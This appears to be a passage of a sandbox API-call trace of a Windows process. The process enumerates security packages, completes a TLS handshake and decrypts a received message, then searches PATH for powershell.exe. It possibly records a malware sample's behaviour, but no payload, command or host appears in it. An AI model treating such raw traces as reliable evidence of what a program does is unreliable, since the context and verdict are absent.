	[0121.228] CoTaskMemFree (pv=0x1b889560) 
	[0121.228] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0121.228] CoTaskMemAlloc (cb=0x32) returned 0x1b860400
	[0121.228] RtlMoveMemory (in: Destination=0x1b860400, Source=0x1a90a6, Length=0x30 | out: Destination=0x1b860400) 
	[0121.228] CoTaskMemFree (pv=0x1b860400) 
	[0121.228] lstrlenW (lpString="NTLM") returned 4
	[0121.228] CoTaskMemAlloc (cb=0xc) returned 0x1b889560
	[0121.228] RtlMoveMemory (in: Destination=0x1b889560, Source=0x1a90d6, Length=0xa | out: Destination=0x1b889560) 
	[0121.228] CoTaskMemFree (pv=0x1b889560) 
	[0121.228] lstrlenW (lpString="NTLM Security Package") returned 21
	[0121.228] CoTaskMemAlloc (cb=0x2e) returned 0x1b860400
	[0121.228] RtlMoveMemory (in: Destination=0x1b860400, Source=0x1a90e0, Length=0x2c | out: Destination=0x1b860400) 
	[0121.228] CoTaskMemFree (pv=0x1b860400) 
	[0121.228] lstrlenW (lpString="Schannel") returned 8
	[0121.228] CoTaskMemAlloc (cb=0x14) returned 0x1b889560
	[0121.228] RtlMoveMemory (in: Destination=0x1b889560, Source=0x1a910c, Length=0x12 | out: Destination=0x1b889560) 
	[0121.228] CoTaskMemFree (pv=0x1b889560) 
	[0121.229] lstrlenW (lpString="Schannel Security Package") returned 25
	[0121.229] CoTaskMemAlloc (cb=0x36) returned 0x1b860400
	[0121.229] RtlMoveMemory (in: Destination=0x1b860400, Source=0x1a911e, Length=0x34 | out: Destination=0x1b860400) 
	[0121.229] CoTaskMemFree (pv=0x1b860400) 
	[0121.229] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0121.229] CoTaskMemAlloc (cb=0x5c) returned 0x1b870c20
	[0121.229] RtlMoveMemory (in: Destination=0x1b870c20, Source=0x1a9152, Length=0x5a | out: Destination=0x1b870c20) 
	[0121.229] CoTaskMemFree (pv=0x1b870c20) 
	[0121.229] lstrlenW (lpString="Schannel Security Package") returned 25
	[0121.229] CoTaskMemAlloc (cb=0x36) returned 0x1b860400
	[0121.229] RtlMoveMemory (in: Destination=0x1b860400, Source=0x1a91ac, Length=0x34 | out: Destination=0x1b860400) 
	[0121.229] CoTaskMemFree (pv=0x1b860400) 
	[0121.229] lstrlenW (lpString="WDigest") returned 7
	[0121.229] CoTaskMemAlloc (cb=0x12) returned 0x1b889560
	[0121.229] RtlMoveMemory (in: Destination=0x1b889560, Source=0x1a91e0, Length=0x10 | out: Destination=0x1b889560) 
	[0121.229] CoTaskMemFree (pv=0x1b889560) 
	[0121.229] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0121.229] CoTaskMemAlloc (cb=0x46) returned 0x1b893230
	[0121.229] RtlMoveMemory (in: Destination=0x1b893230, Source=0x1a91f0, Length=0x44 | out: Destination=0x1b893230) 
	[0121.229] CoTaskMemFree (pv=0x1b893230) 
	[0121.229] lstrlenW (lpString="TSSSP") returned 5
	[0121.229] CoTaskMemAlloc (cb=0xe) returned 0x1b889560
	[0121.229] RtlMoveMemory (in: Destination=0x1b889560, Source=0x1a9234, Length=0xc | out: Destination=0x1b889560) 
	[0121.229] CoTaskMemFree (pv=0x1b889560) 
	[0121.229] lstrlenW (lpString="TS Service Security Package") returned 27
	[0121.229] CoTaskMemAlloc (cb=0x3a) returned 0x1b893230
	[0121.229] RtlMoveMemory (in: Destination=0x1b893230, Source=0x1a9240, Length=0x38 | out: Destination=0x1b893230) 
	[0121.229] CoTaskMemFree (pv=0x1b893230) 
	[0121.229] lstrlenW (lpString="pku2u") returned 5
	[0121.229] CoTaskMemAlloc (cb=0xe) returned 0x1b889560
	[0121.229] RtlMoveMemory (in: Destination=0x1b889560, Source=0x1a9278, Length=0xc | out: Destination=0x1b889560) 
	[0121.229] CoTaskMemFree (pv=0x1b889560) 
	[0121.229] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0121.229] CoTaskMemAlloc (cb=0x30) returned 0x1b860400
	[0121.230] RtlMoveMemory (in: Destination=0x1b860400, Source=0x1a9284, Length=0x2e | out: Destination=0x1b860400) 
	[0121.230] CoTaskMemFree (pv=0x1b860400) 
	[0121.230] lstrlenW (lpString="CREDSSP") returned 7
	[0121.230] CoTaskMemAlloc (cb=0x12) returned 0x1b889560
	[0121.230] RtlMoveMemory (in: Destination=0x1b889560, Source=0x1a92b2, Length=0x10 | out: Destination=0x1b889560) 
	[0121.230] CoTaskMemFree (pv=0x1b889560) 
	[0121.230] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0121.230] CoTaskMemAlloc (cb=0x4a) returned 0x1b88b010
	[0121.230] RtlMoveMemory (in: Destination=0x1b88b010, Source=0x1a92c2, Length=0x48 | out: Destination=0x1b88b010) 
	[0121.230] CoTaskMemFree (pv=0x1b88b010) 
	[0121.230] FreeContextBuffer (in: pvContextBuffer=0x1a8eb0 | out: pvContextBuffer=0x1a8eb0) returned 0x0
	[0121.232] GetCurrentProcess () returned 0xffffffffffffffff
	[0121.232] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7ed298 | out: TokenHandle=0x1c7ed298*=0x4c8) returned 1
	[0121.236] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2faa5c8, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c7ed1a8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c7ed198, ptsExpiry=0x1c7ed190 | out: phCredential=0x1c7ed198, ptsExpiry=0x1c7ed190) returned 0x0
	[0121.280] InitializeSecurityContextW (in: phCredential=0x1c7ed3a0, phContext=0x0, pTargetName=0x2f813f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c7ed390, pOutput=0x2facd10, pfContextAttr=0x1c7ed388, ptsExpiry=0x1c7ed380 | out: phNewContext=0x1c7ed390, pOutput=0x2facd10, pfContextAttr=0x1c7ed388, ptsExpiry=0x1c7ed380) returned 0x90312
	[0121.280] FreeContextBuffer (in: pvContextBuffer=0x1b43a0 | out: pvContextBuffer=0x1b43a0) returned 0x0
	[0121.335] send (s=0x4cc, buf=0x2facde0*, len=115, flags=0) returned 115
	[0121.337] recv (in: s=0x4cc, buf=0x2facde0, len=5, flags=0 | out: buf=0x2facde0*) returned 5
	[0121.364] recv (in: s=0x4cc, buf=0x2facde5, len=93, flags=0 | out: buf=0x2facde5*) returned 93
	[0121.365] InitializeSecurityContextW (in: phCredential=0x1c7ed2c0, phContext=0x1c7ed570, pTargetName=0x2f813f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fad0f0, Reserved2=0x0, phNewContext=0x1c7ed2b0, pOutput=0x2fad110, pfContextAttr=0x1c7ed2a8, ptsExpiry=0x1c7ed2a0 | out: phNewContext=0x1c7ed2b0, pOutput=0x2fad110, pfContextAttr=0x1c7ed2a8, ptsExpiry=0x1c7ed2a0) returned 0x90312
	[0121.372] recv (in: s=0x4cc, buf=0x2fad200, len=5, flags=0 | out: buf=0x2fad200*) returned 5
	[0121.372] recv (in: s=0x4cc, buf=0x2fad225, len=2549, flags=0 | out: buf=0x2fad225*) returned 2549
	[0121.372] InitializeSecurityContextW (in: phCredential=0x1c7ed1f0, phContext=0x1c7ed4a0, pTargetName=0x2f813f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fadcf0, Reserved2=0x0, phNewContext=0x1c7ed1e0, pOutput=0x2fadd10, pfContextAttr=0x1c7ed1d8, ptsExpiry=0x1c7ed1d0 | out: phNewContext=0x1c7ed1e0, pOutput=0x2fadd10, pfContextAttr=0x1c7ed1d8, ptsExpiry=0x1c7ed1d0) returned 0x90312
	[0121.373] recv (in: s=0x4cc, buf=0x2fade00, len=5, flags=0 | out: buf=0x2fade00*) returned 5
	[0121.373] recv (in: s=0x4cc, buf=0x2fade25, len=331, flags=0 | out: buf=0x2fade25*) returned 331
	[0121.373] InitializeSecurityContextW (in: phCredential=0x1c7ed120, phContext=0x1c7ed3d0, pTargetName=0x2f813f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fae040, Reserved2=0x0, phNewContext=0x1c7ed110, pOutput=0x2fae060, pfContextAttr=0x1c7ed108, ptsExpiry=0x1c7ed100 | out: phNewContext=0x1c7ed110, pOutput=0x2fae060, pfContextAttr=0x1c7ed108, ptsExpiry=0x1c7ed100) returned 0x90312
	[0121.379] recv (in: s=0x4cc, buf=0x2fae150, len=5, flags=0 | out: buf=0x2fae150*) returned 5
	[0121.379] recv (in: s=0x4cc, buf=0x2fae175, len=4, flags=0 | out: buf=0x2fae175*) returned 4
	[0121.379] InitializeSecurityContextW (in: phCredential=0x1c7ed050, phContext=0x1c7ed300, pTargetName=0x2f813f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fae250, Reserved2=0x0, phNewContext=0x1c7ed040, pOutput=0x2fae270, pfContextAttr=0x1c7ed038, ptsExpiry=0x1c7ed030 | out: phNewContext=0x1c7ed040, pOutput=0x2fae270, pfContextAttr=0x1c7ed038, ptsExpiry=0x1c7ed030) returned 0x90312
	[0121.385] FreeContextBuffer (in: pvContextBuffer=0x1b87a650 | out: pvContextBuffer=0x1b87a650) returned 0x0
	[0121.385] send (s=0x4cc, buf=0x2fae340*, len=134, flags=0) returned 134
	[0121.385] recv (in: s=0x4cc, buf=0x2fae340, len=5, flags=0 | out: buf=0x2fae340*) returned 5
	[0121.425] recv (in: s=0x4cc, buf=0x2fae345, len=1, flags=0 | out: buf=0x2fae345*) returned 1
	[0121.425] InitializeSecurityContextW (in: phCredential=0x1c7ecf80, phContext=0x1c7ed230, pTargetName=0x2f813f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fae4b8, Reserved2=0x0, phNewContext=0x1c7ecf70, pOutput=0x2fae4d8, pfContextAttr=0x1c7ecf68, ptsExpiry=0x1c7ecf60 | out: phNewContext=0x1c7ecf70, pOutput=0x2fae4d8, pfContextAttr=0x1c7ecf68, ptsExpiry=0x1c7ecf60) returned 0x90312
	[0121.430] recv (in: s=0x4cc, buf=0x2fae5c8, len=5, flags=0 | out: buf=0x2fae5c8*) returned 5
	[0121.430] recv (in: s=0x4cc, buf=0x2fae5ed, len=48, flags=0 | out: buf=0x2fae5ed*) returned 48
	[0121.430] InitializeSecurityContextW (in: phCredential=0x1c7eceb0, phContext=0x1c7ed160, pTargetName=0x2f813f8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fae6f0, Reserved2=0x0, phNewContext=0x1c7ecea0, pOutput=0x2fae710, pfContextAttr=0x1c7ece98, ptsExpiry=0x1c7ece90 | out: phNewContext=0x1c7ecea0, pOutput=0x2fae710, pfContextAttr=0x1c7ece98, ptsExpiry=0x1c7ece90) returned 0x0
	[0121.516] QueryContextAttributesW (in: phContext=0x1c7ed110, ulAttribute=0x4, pBuffer=0x2fae828 | out: pBuffer=0x2fae828) returned 0x0
	[0121.516] QueryContextAttributesW (in: phContext=0x1c7ed110, ulAttribute=0x5a, pBuffer=0x2fae8a8 | out: pBuffer=0x2fae8a8) returned 0x0
	[0121.527] QueryContextAttributesW (in: phContext=0x1c7ecfc0, ulAttribute=0x53, pBuffer=0x2faebf8 | out: pBuffer=0x2faebf8) returned 0x0
	[0121.535] CertDuplicateCRLContext (pCrlContext=0x1b876a50) returned 0x1b876a50
	[0121.538] CertDuplicateStore (hCertStore=0x1b88bdd0) returned 0x1b88bdd0
	[0121.539] CertEnumCertificatesInStore (hCertStore=0x1b88bdd0, pPrevCertContext=0x0) returned 0x1b876ad0
	[0121.539] CertDuplicateCRLContext (pCrlContext=0x1b876ad0) returned 0x1b876ad0
	[0121.540] CertEnumCertificatesInStore (hCertStore=0x1b88bdd0, pPrevCertContext=0x1b876ad0) returned 0x1b876a50
	[0121.586] CertDuplicateCRLContext (pCrlContext=0x1b876a50) returned 0x1b876a50
	[0121.586] CertEnumCertificatesInStore (hCertStore=0x1b88bdd0, pPrevCertContext=0x1b876a50) returned 0x0
	[0121.587] CertCloseStore (hCertStore=0x1b88bdd0, dwFlags=0x0) returned 1
	[0121.587] CertFreeCRLContext (pCrlContext=0x1b876a50) returned 1
	[0121.597] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1b88bea0
	[0121.598] CertAddCRLLinkToStore (in: hCertStore=0x1b88bea0, pCrlContext=0x1b876ad0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0121.598] CertAddCRLLinkToStore (in: hCertStore=0x1b88bea0, pCrlContext=0x1b876a50, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0121.602] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b876a50, pTime=0x1c7ecfc8, hAdditionalStore=0x1b88bea0, pChainPara=0x1c7ecfd0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c7ecfc0 | out: ppChainContext=0x1c7ecfc0) returned 1
	[0122.286] CertDuplicateCertificateChain (pChainContext=0x1cd94da0) returned 0x1cd94da0
	[0122.287] CertDuplicateCRLContext (pCrlContext=0x1b876a50) returned 0x1b876a50
	[0122.287] CertDuplicateCRLContext (pCrlContext=0x1cde0860) returned 0x1cde0860
	[0122.287] CertDuplicateCRLContext (pCrlContext=0x1cde08e0) returned 0x1cde08e0
	[0122.288] CertFreeCertificateChain (pChainContext=0x1cd94da0) 
	[0122.288] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cd94da0, pPolicyPara=0x1c7ed148, pPolicyStatus=0x1c7ed128 | out: pPolicyStatus=0x1c7ed128) returned 1
	[0122.290] SetLastError (dwErrCode=0x0) 
	[0122.294] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cd94da0, pPolicyPara=0x1c7ed220, pPolicyStatus=0x1c7ed208 | out: pPolicyStatus=0x1c7ed208) returned 1
	[0122.396] CertFreeCertificateChain (pChainContext=0x1cd94da0) 
	[0122.396] CertFreeCRLContext (pCrlContext=0x1b876a50) returned 1
	[0122.424] EncryptMessage (in: phContext=0x1c7ed7d0, fQOP=0x0, pMessage=0x2fb1320, MessageSeqNo=0x0 | out: pMessage=0x2fb1320) returned 0x0
	[0122.424] send (s=0x4cc, buf=0x2fb1058*, len=117, flags=0) returned 117
	[0122.438] setsockopt (s=0x4cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0122.438] recv (in: s=0x4cc, buf=0x2fb1480, len=5, flags=0 | out: buf=0x2fb1480*) returned 5
	[0122.467] recv (in: s=0x4cc, buf=0x2fb14a5, len=2112, flags=0 | out: buf=0x2fb14a5*) returned 2112
	[0122.468] DecryptMessage (in: phContext=0x1c7ed390, pMessage=0x2fb1df8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2fb1df8, pfQOP=0x0) returned 0x0
	[0122.486] setsockopt (s=0x4cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0122.490] SetEvent (hEvent=0x360) returned 1
	[0122.522] VirtualQuery (in: lpAddress=0x1c7ed530, lpBuffer=0x1c7ee3f0, dwLength=0x30 | out: lpBuffer=0x1c7ee3f0*(BaseAddress=0x1c7ed000, AllocationBase=0x1be60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0122.529] CoTaskMemAlloc (cb=0x104) returned 0x1b848810
	[0122.529] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b848810, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0122.529] CoTaskMemFree (pv=0x1b848810) 
	[0122.532] CoTaskMemAlloc (cb=0x104) returned 0x1b848810
	[0122.532] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b848810, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0122.532] CoTaskMemFree (pv=0x1b848810) 
	[0122.532] CoTaskMemAlloc (cb=0x128) returned 0x1b840900
	[0122.532] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b840900, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0122.532] CoTaskMemFree (pv=0x1b840900) 
	[0122.536] CoTaskMemAlloc (cb=0x20e) returned 0x2251d0
	[0122.537] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2251d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0122.537] CoTaskMemFree (pv=0x2251d0) 
	[0122.539] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.540] SetErrorMode (uMode=0x1) returned 0x1
	[0122.542] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.793] SetErrorMode (uMode=0x1) returned 0x1
	[0122.794] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.794] SetErrorMode (uMode=0x1) returned 0x1
	[0122.794] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.ps1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.802] SetErrorMode (uMode=0x1) returned 0x1
	[0122.804] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.804] SetErrorMode (uMode=0x1) returned 0x1
	[0122.804] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psm1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.809] SetErrorMode (uMode=0x1) returned 0x1
	[0122.810] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.810] SetErrorMode (uMode=0x1) returned 0x1
	[0122.811] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.psd1", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.812] SetErrorMode (uMode=0x1) returned 0x1
	[0122.812] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.812] SetErrorMode (uMode=0x1) returned 0x1
	[0122.812] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.COM", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.814] SetErrorMode (uMode=0x1) returned 0x1
	[0122.814] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.815] SetErrorMode (uMode=0x1) returned 0x1
	[0122.815] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.EXE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.816] SetErrorMode (uMode=0x1) returned 0x1
	[0122.816] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.817] SetErrorMode (uMode=0x1) returned 0x1
	[0122.817] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.BAT", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.818] SetErrorMode (uMode=0x1) returned 0x1
	[0122.818] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.818] SetErrorMode (uMode=0x1) returned 0x1
	[0122.818] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.CMD", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.913] SetErrorMode (uMode=0x1) returned 0x1
	[0122.913] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.913] SetErrorMode (uMode=0x1) returned 0x1
	[0122.914] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBS", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.914] SetErrorMode (uMode=0x1) returned 0x1
	[0122.915] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.915] SetErrorMode (uMode=0x1) returned 0x1
	[0122.915] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBE", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.916] SetErrorMode (uMode=0x1) returned 0x1
	[0122.916] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0122.916] SetErrorMode (uMode=0x1) returned 0x1
	[0122.916] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JS", lpFindFileData=0x1c7ed7d0 | out: lpFindFileData=0x1c7ed7d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.917] SetErrorMode (uMode=0x1) returned 0x1
